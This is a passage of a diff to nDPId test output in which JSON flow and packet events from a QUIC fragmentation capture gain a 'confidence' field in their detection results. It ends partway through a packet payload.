-00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495211515,"flow_last_seen":1621495211515,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495211515,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"65.33.51.74","src_port":61886,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00689{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495211515,"flow_last_seen":1621495211515,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495211515,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"65.33.51.74","src_port":61886,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00624{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495211714,"flow_last_seen":1621495211714,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495211714,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":65391,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02299{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1621495211714,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621495211714,"pkt":"AAAAAAAAAAEAIHu5CABFAAViFYZAAH4RYHaokEAFgPgYAf9vAbsFTmBDy\/8AAB0IOJJ3hsacNv4AAEU0baY3xqzzCvPxyArXzKLDKouHC7RJHh3pTwE\/T+gSQ10GMfO+dVkOJKeQmaLmpDDYpWDl93SoFgzgGj9JyJNxMfBbB3KINp6o8wpksTBkLOXzlV1A9kaeJmvRuK9RfLEFAe9vWScl9hjEsPcf\/QHzr36kD0umOekJmoKT6EqNBn5HwV2qpv87uu9skIz297knDD7vXWjxtwVhWb2tUz96K+btC4+kYJ\/VTNFpLAAIcX3fAe2CLqMf5rdoAycaNQOrLtyNhjw8JnO7NaOOS2\/V7TAr3iqoiWd7r9g+yYn6wAauOjYdWUM3sLAzE8JEijyJO4SAWMXK5LL45C8m56doUnVsNdTCfisF3ey+SwnsCSNggQyi7Ouznig0OBO44rroi3XNqvU4LOwiK\/7gydyfJ7z8wQ\/CI7gjztoz6kc8GMvLgxoJrOq5QzKGL6SbpCNfU6v5q5B8KSG99Sw7MC0kFWTOVIriQx89bvz3x8+ENfpFjHGCeDGEJs26uPwMaNh7ZXQJu1bIpbynvx5JRciSvltkVonCWFzNIp85z5bLW0qXOR0D8EYnkuSjvrZjqrNGNBMZrsHxs1dhO9sGDPIJZPKKGbiC1LxvCMo8xLyF2KZ4PDuHQao+nhqvmJJ0FnbteaTR2scFeXrZiaEGdUThIbCZ7xFmpi7zJM6Ez+sDozO+l3U\/nDTzpPqb+YFL\/0gJU\/AUM69B7j2ezG\/ZIzXQnvmArJVY6m58fYrvGMWNWx5RPDKMXRovwphMGFpUrttX+ttkG+hnB\/imTmkNkUHlqG7g4Q9yRPtSmiXNoEcRe2m8G82yLhBdi9vCclLuBd3LIW1+jXuzc68F1rWZrdVl66iE3UrQLgYnE9WlbCx8vO9E1HF4UpTzPBsFkz\/gOnRuc5WFYHt8O1tUyjv+r05xeK\/ucSaip+2KvZ2Wn1vtwi1odfHkn928POP\/fatifY3iR8WW85F8j4l7UkwInAOtPIz4a6KaKlhTK7GHeMTHER7C1+udBnuKafcdz2PCgJtfWbNxuRucdkkL4mtNfG+hQ\/oCMcBz2poMGIWruxUUwjSwDC3\/Z\/7ipxJOYFn0N8zoMZoCBCBecBVZsLuTJPhNhGB8mSVMMgG2PIsT5NsIOJgovfJrMge08M6CwHrIrU9N5WoiLUvWzJR6vtyL7kEOB70wX6qeabNuf460VB6kIYBN0ZylEP6ZPp4E1RdeoL\/+gOoUe\/V+fKX2QyW1NVSMf+bPC79LkMK0mq2Yhwu5OOnXK1F5\/htvUXqZoAIfhzWAb6naxPrZnP3UqpUf+sMeFX1+B6L98E8Ga9Q1eAsSEPQKRPMDqtSqUKcxSBTRIdpIsSVldrFya70Ko0OKwa4MImURluJnCIMGigCLraP1uJSre+IlkkCQHx+ALZFgGUF0m6nJCLlzQIPva5PhNjC1BFxFj1qqzQq2jmua3tWhbeE7be6k6KK7E9msFfmbvGWCvXmtAa38RMRgtaAp43rM2bZelQ\/hndrt4tse1PjmE31ey8yFJauzvzqjCU95vawcS9zc0SFlOFUMyEq1YWPNDLhqRw2bLrw77gsmS60Do+kYYnbefAdllcPRD5EtBLZ\/rvvE255KhAfhLTFjkdJhuYORsFfaeyqgTFqFjOPcC5F7SZ6rgIV3ZOpPO1FLTknWKAEeYHjfgojr6Fd+FA3kLkSHqNanwaRwB5wf+KtFKdlHSWZ248KX1x+WbTZxOW144N1+mnwBxnyKg8oVlnpGY0NEGjU76RZdNILMXhsMVMGO5Nf2"}
-00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495211714,"flow_last_seen":1621495211714,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495211714,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":65391,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00690{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495211714,"flow_last_seen":1621495211714,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495211714,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":65391,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00626{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":115,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495213177,"flow_last_seen":1621495213177,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495213177,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":58832,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02296{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1621495213177,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621495213177,"pkt":"AAAAAAAAAAEAguyCCABFAAViV9lAAH4RzGmokEAFdZR1HuXQAbsFTiWSzf8AAB0IA03G00cjw3oAAEU0zpEREYtHc7fujisRl6Znia+7gzai8j7ZczB+a4Fyh+TnPaUk2oSi6h8oKvmj8nm70si+eFwEDb3FGL0hKLe6Q+jl35hlotxy8iz2MJJ+5JCecVMwWZMxK7aUkr6CaJRjwV5CAn1HRTHFLENZoJSkm3TO9IVstjeamQNND1C4DAYpZCGs04m3llenDZ\/2nNSsBRAqLZzlWTAHq1v+l8D6eE3YZLIpE9IrHycGHzViWxzXMi5yEaLjXG7\/gQk6gthaWh+hPIwJXrVk91+SXWpGfGKCCJtYXQe\/YYWnkpx+6u0xCJrCQ8l49V7DgS4W5guuiYck\/qFFKjVY3epgO0wSz+88pQcwVBobJMMXob69lIlXUiGJFQRdauvWOZcO\/L\/bUlflHcZ78ul\/rMPxQOiK365X16shY0I9m9aYK0vHWaLkQuxh6V0ZNOx509fgaFleyoO82d6dXpdyjt1rJM5gsDy8odRbJsobykqUplaDy3hP2x38Y9FzMJXsgHrai1zY6jqfTltw56ae\/7dvGxvxIVqCGlfOb2WjNFBF9\/LB8quZqSRVstaohJPnGpH7kVyAxNV1GTpVzDBbsxBWsfLG+Y7\/HImytHwpfxKeW3R2CAwJZXalypABlNkFfbhaeKzeql7ba3QOrsZyGQN7oaq3Rq3MAidC50gUVpQUByaEzPovR+3MmbtY6D5hLfj4TN1QByItBrTV\/XlHoWnrq\/DHJ4ZfBK4zLh4CNky8ZPsi936i8oU3g2YuXcCw0bkg8r1WCGjKJv+rdzI5ilHttek2MA7UUHCX5ICi6MB8S0s0wZiaZIPzdp7MYwsb4SgwIeWyJ2Ljz5IdSO5DxWBGvbcD9yl+3B5kIRZEtQmYdVCNieJFQkO6Us4QcNQDENcnaYpjFm\/ja8QmX5kP93aPcbMzm7nfVngHcDxxMgMXHIvkRkcvMcFjZJTHJgMU5LFMiXkxk9yZXV+hQMvPDgQgvkvRiW99Zwppx6x\/J1jFTyAohgUibbubWRLh2AAzOHgCz2ig8L5dy9K7xCzr2Xth\/JmLkyadTNCAUj3zbID3KEBBrhe454xxmAcXntpqr8uF6By1xuvy3exW+x5KB9i1AkZNkw8L1Op43WXQvcjQxCD2resMdq+jtdzg47L\/nQ0rZyzurYJ5tT1FAT7vCsWTCaOAsiVbUmvYE1uDvAMF9dJOXuF07HLb5+xhG1XKtBDaOfchBz4SNo7+00DbN4f8EY+FxpAZKzDK9+wj+5BzVIV5iHrtH90bEmt7eAhSPZN2MjbGFeQuyxUnOzpi\/795U5CmJvNPvJeaGfSzxnjjNqBTlb+T9XJYP1XT7ItPX5ZrMBWdJ6WInKgcMnSb2gw\/ieLuFgYlaEbn3nw2Vps5tGD919b7P4tV2g20hLlqcbNlmZvviPXipf7UweSGsqmu4S0nRNTJ61wiXAEF9d+3Zvcx2Lmv6aESs4Y631voX+3P0avN1hltZJfMZHdpe6CRgj1Svw2JJxscjkxqwmbkwKldXEka+ot\/nIwrZRrkvverD8GcfNN7+gJOU8G7udQ0SKUSqI3DPyaSEb3IvIFaVDZ9Yz+HehsjvORG3zJlR2sfIgeQFPc8JjjX7ExTKf4uZOMgdLlrhCbrevhMCmiyKdBoPDkbnbi+c7aKMwm4qE+d0MtqO+rSQNHrDkMuYBESTLtHgl3RIqbnlrw9jNZIDyZG7lobW7PunDtEOt++PlNOlUQLnkW8gWBV5Vw3kQ50hMAtvSrX7RiOHr+5QxC\/dT+DEQPpku4M"}
-00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495213177,"flow_last_seen":1621495213177,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495213177,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":58832,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00692{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495213177,"flow_last_seen":1621495213177,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495213177,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":58832,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00623{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":116,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495215529,"flow_last_seen":1621495215529,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495215529,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"38.57.8.121","src_port":58429,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02300{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1621495215529,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621495215529,"pkt":"AAAAAAAAAAEAz315CABFAAViMsdAAH4RrXyokEAFJjkIeeQ9AbsFTmZNxf8AAB0IjZ\/i0MvbChYAAEU0Kuw5tIMbBep8zuXyFh\/CQw4vOa+ci4Wju1UfAkTGptA3xc23uwjbUED35IsAoT1c1vWSSpo1qoNbbUHZHartpYEZfoDzKqE0vmMKIRKBVz8p9UZnDMRqEXsN0o34IBa1u+5euUoZbZycVQbYG92X8tEJZUuLJQNPn7c9r8wIv6AfrnNfGtmki3v2aiKtRgXC1xcP0t\/BRF8i60R1e0\/SZfsdw6zmYKvXlb6meRkpRjolbih4G9oDqWoYvNI3EweYqf18S8s\/Xw6XLAvhzqAm+tqeiz6MfzwYKpLZdbP+6NSV4r3QlXmUMLI\/jOvlrh2GzjooQOG5gNIFQswRTZAMHIhQW9aX0Uhtiro\/cjYViGWEjpDbnwQi\/f7j2jafAUU5cUdCbYu6b8KUGI8MRCPg03ccQcmTOrbzbnsYFqQdZj3Oaj8oPF89fzvyu7ZZXic6q3INwPefXtAfiCceDxI7\/qwuFETUy4AU9YE7NPDCQfhrqLkBFnC7toLh5HLAWW1g0atzU1bIesqMtiWQNHpw6ilYy0P0Mml\/aLO3UASH2I3JzMRigR+aiKHJTQR\/7qGDxupagWFJiIqCs23iBup7jh85U3Fb7lC6WFTUyRRb69IuyN+9pN0xgb27sCXsGTU5vt5Xt2fpbYpKxX\/1dPfIOhbYqrmreZW09kjCedA6npXTYF2Ddu\/RWOqA5Xghl9jTCdqu6G0lVaF+jiT3YIuLbZJBefXJGeKLb1x3aZIAvordZ1rRKFBzQeFxpLpCEcohnAooS5OSu2JU2sjJcG1hFM+uZdDDe2S8bf3T5QmynqA8xZRBQc6ToAej8kU8ilRATsLphK1qTG\/Xz7HAZyaItvAVUzN6AWfe\/ptcf2FpFG2vlv3Nc0Z1o2VG2XhPHikHnP5H9GmBG4UvIGGheJm3UYfUhbFAGglGvMuSmmtTawrqACMC8ZL7+eywRfyAHmj2YOXc7igcQwM2+guxC97qeBDa6jfdMcnO1bIdOInih7VYVwp0RjaCC+xN+4sckLy91v+s6XAPniEeoaqNyxLx+zsyaYE3UO5mABu4ikw2PcrohSn8TsfYSVSIfgAf3oLeJLdeG1bAZzEHT\/leWIkPiXuKIU0JDfdwOyXbw0eJ5gIW1YwjA2PUC5WJteN3WrLf8QiM9XX\/Vnzx4CmxYhWKkYf1Lms81UyEAeHrhnSqRF4\/AUoTnEquDJImovna0QvL+UOKkZSGEQcIAHeGIN6oPpH2oVBuiKI+RIvF5od7\/HWj+KFD8j2HzDyGRrNak8i094ic3pv2Aa6Cy\/pDa+ri9GH9xvhxAT3g2LM5lW2jscCz4hr8ebvRoA6CFelcv8lyZNiluZSp4IXd3iBFb1h8XxnRIE94i5gNvCAP8AmDTshrDks9RUCJHBBxk2BRF01pWvmRN8ElDWQ00dKuNP43VwqvSZ80un7FDHwLTAiTkBxVuJmvxpNZO3IULz3xvMrJ4LFPOw4b5QWDjTvT9WZlVzi9JB\/dTancAXzz2jBSEE6cYk2wWN6hnWoimeysgkr9X+fnYznZZgkwvcmh6\/9WvRiIEio6b47a+d\/jSjLA0myTcbP51ndIrUeSm6xKHw48elW5Y4cR28w74dfEdPAhCtbHXOrPtvEYai9yvuuXjnL730N97zJThOnxmNOFbUdMaXOxLxlVUjy3ij38AxXx3a1TBJPSG++6lWuMKq5\/ce+1tui+NbZpHfRwO9L08Y5JbOLjByhgfrTXucF8VzVamDTbs+YZB0jFlVnPIVEyy9+ALSpx"}
-00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":116,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495215529,"flow_last_seen":1621495215529,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495215529,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"38.57.8.121","src_port":58429,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00689{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":116,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495215529,"flow_last_seen":1621495215529,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495215529,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"38.57.8.121","src_port":58429,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00627{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":117,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495262761,"flow_last_seen":1621495262761,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495262761,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":55479,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02300{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1621495262761,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621495262761,"pkt":"AAAAAAAAAAEAWIVLCABFAAVi\/CxAAH4RFtuokEAFcfqJ89i3AbsFTtpyxv8AAB0IHXYeW7GbkDwAAEU0cyqOvF0+zYFsDnDfj4qOegRwsK7IcQ46MH6ESOEovF69nrZGDb8lKJa9phduFdjj1k7I3mcSp4Fdox5WcOh+Uk0cZGV9fR8f0Ov6zlNHFynF0QcbyVzvpNKgfvb8FqOCsESZfnFqWIzSpjIdVFlIM3yGTD4xRjUDj1lkW0ZKllGp0aQyqCDwNkB2CqU7d1CD72aJJk6ATZ5lUmDmABhPxDZwNUEhhB0chtpF8CIMAjmAGtezZ9ouDWqW0JaiqP5zXHWUGVi+z7DqfOejMwTbhzyaKq6ngzgT0dc4966YOPgwrtJBmxim1uPIY6NQh1pHbxeKNPmo8hj2epIuOqIMeDvvwdBWt6aow69y0olkvm78WUKYVJpmQdNWK+CVp+C+UL6rmP4PjV2PigOvgJF4H38tUPzh65GKLY0ga\/03NYN\/hX0Wcjs3++ENhz4iZc9+ddaf4+4pRDlD6mkW65ATNBDIl52suxSlHN6HoynqSQY6oZvh++nCIkcG2JxZLMQ+T5nEGqj1gwsdkjle94+N9qANI7eVxlFdlntuY1+N6nk5tmMWoS\/R0WbGishHO3u6EhfykqYhHXVE59N0j+8mB5Q9+jh8ZGBt\/NKUSJCoOfZ7q1P7RZUejh0sTC65YebfomkMvboGteuZqOvQk5NXlMjaVzstVKAdT6JvVJwPuXaX88hdT72igJ3B2AlgfOI1RsIfOC7FpyGwZsX0av\/4fXJ6M0fmGATLs+LOo4iBiEQLKy0SWsPZJRQK5lZfzyxcJnxK7ZE2ACTGiwRfjEenycHidxzoFBMaR3paq4nM1XEwRUFSnVOIS589othRj472lPeD94UycNLpQ2JPV22UDBzaHVYUBpfKZcwtDascUlLDRFdo3SHiMcj7LOsEcBA5rulkUjsct5xpoNXx5B\/B2+m3KXZ00FyHamtLDjb7Po\/NZFWUfzZKuP1J\/hJm8Y99WXOElkvVgKn8xnPv5xhHavshHOttAR1+3H5+GmaPeuozfGPx1lOvgf97f4mVbgfunDuvEFxroS6I721gl6SvWtXHjyFJgJ0rIse8i6rRMQEoqSyvpxXclyfXHJ\/psvDdCdjhdvfvawUeb8D4u\/YZgul2vd1LWGMVgejI3sOxrePT+0ro1TsD+i0FH5MXZ8HvKJqB\/TAP3NBVUsk4YNndeX3dsYusAsf3qVTja16TeR5sSx\/+z+wRVz0lq7+OCWGxB8fNRGzmbAenuE9pS\/k2Ghc4RQd15aI2tGcDl7Yc7AtkS9GD1efiAgnbw\/ROL6uZMSwnSghBH++dvDhhHzVcSwVinWhVZeyH9xqIAn\/kFmpDD9BO5Dxi3TuuZgOY\/344mR5RfwsNXXiMndFoP9P9LnMgWMYN5fr9gxkoFqo96s9ZpovfzjCbESzAw1U1OTZa7Lw4eJBkreLeO8mAYYE+LTsjfFVvC6rsliMl92joXcb85RkQrnTc4eatNXHuuYwvm\/Dr6O+7Ki2lIM4KcPnOCaF82c+PeLXbukzNmSEE3xvbz8wD0oxVX6eIeHO46TvhNZLEqAkuH1Fk8o2uNjEO5NN\/4T6X9Vx\/U7um8EnKZhp\/2mSs8gyRdalK6y\/u3KgU\/B7rnXkAB8DpUU3+R\/57bheJygo7zgvAvl0Dq3GraOVbrzJOvE85qkvo2AcnP0BV6NyqQmSYY0qcb0HX5twA+m3yMctUDJ6LSc5yUQvOXJncRh308497vAxONTdvp9+L4KLUhVLOh0L+x+RbMxsPkaaIn6POFyWoSrw0UDO8jroi049O"}
-00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495262761,"flow_last_seen":1621495262761,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495262761,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":55479,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00693{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495262761,"flow_last_seen":1621495262761,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495262761,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":55479,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00624{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":118,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495274945,"flow_last_seen":1621495274945,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621495274945,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":60934,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02304{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1621495274945,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621495274945,"pkt":"AAAAAAAAAAEAIHu5CABFAAViFcFAAH4RYDuokEAFgPgYAe4GAbsFToSxy\/8AAB0Ifg25e8dGmIEAAEU0NqVCEso1JyDnNa3XDGKdMJ5pTtV4nHofZAOnT1W+icJE5UY0TxDpCncREJLRH\/MPp7gaAubIBfy0WALhYVrmN\/h663kyTLy3uhofsu0TFEUnEWA+7HI+9JmK++aEmLEdeW6aDw9AD7oHPVlHJCcNoL6DRjUXNW6UwhifFO\/SGjrLRnHDVvcCbj383i203PYQCpsw1TTQLBNjWKjDQrTtIXrNx4V3oD1ei\/pnb3fnosV0RqaaT5EdA\/kbj3Qunb\/sj0TkZt219kbzZOuQOBwN97ZcgkkMco25yPaA5EE6pEJVtcYRhFHMV56RBuHnwBmJlpzat7EiWvBo17\/ZB4IV0XDC1EnRW7hVi1JGuDqv9wZh2naSmQwKBXisH1o8XxVgnKQThxyfXjf51QhQEpwyOBsPYA3sE80VUeUeF8YLmKJTmzCfKKen33pI74rSdatEVK\/riZ+k6Nx5Kv9ipxPveh\/OIKxrzg8fgwo6AtFiL7zpCKxJqETtW0Xa1iFaOYl7Z94ySPI0GrURbdOh17EWunCEGOaxFh5r1hyG20LK9uvCozSsHKRFAEEt8MTzWmZpHhUXoL4EBByiqvMPoD\/japbNeuqz+NZjcIAzLd5J7FIuRz17WAcrSLxduUWgAyBLIUVUSdw8wWeTbHOqa\/\/igt66GxhOxwnJA5q2ICcxEMzAYQknRdL5EwIR5G9hyMyaMEPKFuOhlR5K87PPV1OV5HTKBWuuQYcTSS2eMTcfL+LwS5zCy0DYr9XLJSQUeYXIgqrKv\/AHsPiF9PATspeWFZmZlm5GhZRglJ\/XKQG9XUxzfhDhP7y6m5R5\/xhVN6r91dLobOj3Hr6xnIg91wuWL0hkq29euOXZEAmYABS2BlN1JqxVxLeS1gYwKu8ZXJt94wPKz57Z6Ujs9YFRokZxZZDrRK8PX7BCPLDmcPiN5sNo15756ioaNcl4AX4v0EDRvDj3vYMKyFtQk58BOP\/uvTqrr6VjolIemKnqeJ\/sLePz3jY4p3NKgfKlmuliP81+pLj33EztpDUD3jYbL+MxSlNzeEnBCL7fOUVNAt\/9QxLRubiaTnxA0KR3eUjeh2rkb9KibkuXgAjUnvVEkK8aTr4Rjx98mH3whwCOTSwaDUKhnghn7bTjoDbh7vaeGMq9kSnvTDYXLIXgXgxvzNNlytJRA+bygeEgrquKFCSVVMG8J90v4BnHeAlvc4DYHIx2qJUsM8Lon6vK0e+65TgpTZKgASs0YbzDsVlALTwsNmrzZ9Z58wPBg9nT0ApUWY+Bvw20yzKGeOF5612Kox\/Kgw9M\/S4tLsnL4GEyFvrXltx2UtehZ+rnmLj2SsFbXxyq4ELJqWAjXNYab2bIqTsuwJ23bC\/hV\/lb65I48n7iyde1m67ozjQ5jCDaDVbnKLpriZVB6HPOjVFDe\/50gs0o2kVKPKEL